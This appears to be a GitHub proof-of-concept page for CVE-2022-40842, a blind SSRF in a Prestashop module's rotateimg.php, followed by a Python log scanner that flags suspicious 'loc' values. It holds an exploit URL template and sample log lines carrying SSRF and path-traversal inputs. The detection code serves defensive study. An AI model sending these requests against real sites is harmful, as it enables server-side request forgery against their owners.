CVE-2022-40842: cve-s/poc.txt at main · daaaalllii/cve-s
ndk design NdkAdvancedCustomizationFields 3.5.0 is vulnerable to Server-side request forgery (SSRF) via rotateimg.php.
# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 blind Server-side request forgery (SSRF)
# Date: 01-11-2022
# Exploit Author: dalii
# Vendor Homepage: https://www.ndk-design.fr/
# Software Link: https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english
# Version: 3.5.0
# Tested on: Windows 10
# CVE: CVE-2022-40842
Parameters: loc
Exploit:
http://localhost/modules/ndk_advanced_custom_fields/rotateimg.php?loc={inject here}&rot=90&top=1000&left=1000&width=1000&height=1000&imgwidth=1000
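As an added defensive example (not part of this PoC or of the vendor's module), the following Python script scans web-server access-log lines for requests to rotateimg.php whose loc parameter carries a URL, an absolute path or a traversal sequence, which is the pattern the SSRF above relies on. The combined log format and all sample lines below are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx combined format (not real traffic).
# Line 1: benign relative image path.  Line 2: loc carries a remote URL.
# Line 3: loc carries a traversal sequence.  Line 4: other endpoint, ignored.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2022:10:00:01 +0000] "GET /modules/ndk_advanced_custom_fields/rotateimg.php?loc=upload%2Fimg1.jpg&rot=90 HTTP/1.1" 200 512
203.0.113.9 - - [01/Nov/2022:10:00:07 +0000] "GET /modules/ndk_advanced_custom_fields/rotateimg.php?loc=http%3A%2F%2F203.0.113.77%2Fprobe&rot=90&top=1000 HTTP/1.1" 200 77
203.0.113.9 - - [01/Nov/2022:10:00:12 +0000] "GET /modules/ndk_advanced_custom_fields/rotateimg.php?loc=..%2F..%2Fx.txt&rot=90 HTTP/1.1" 200 77
203.0.113.4 - - [01/Nov/2022:10:00:20 +0000] "GET /index.php?loc=http%3A%2F%2F203.0.113.77%2F HTTP/1.1" 200 9001
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any URL scheme (http:, ftp:, file:, gopher:, ...) or a Windows drive prefix such as C:
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)


def classify_loc(loc):
    """Return a reason string if loc does not look like a plain relative image path, else None."""
    # parse_qs already decoded once; a second unquote catches double-encoded values.
    loc = unquote(loc).strip()
    if SCHEME_RE.match(loc) or loc.startswith('//'):
        return 'remote URL in loc'
    segments = loc.replace('\\', '/').split('/')
    if loc.startswith('/') or '..' in segments:
        return 'absolute path or traversal in loc'
    return None


def scan_log(text):
    """Return (client_ip, timestamp, reason, loc) for every suspicious rotateimg.php request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.endswith('/rotateimg.php'):
            continue
        for loc in parse_qs(url.query).get('loc', []):
            reason = classify_loc(loc)
            if reason:
                findings.append((m['ip'], m['ts'], reason, loc))
    return findings


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```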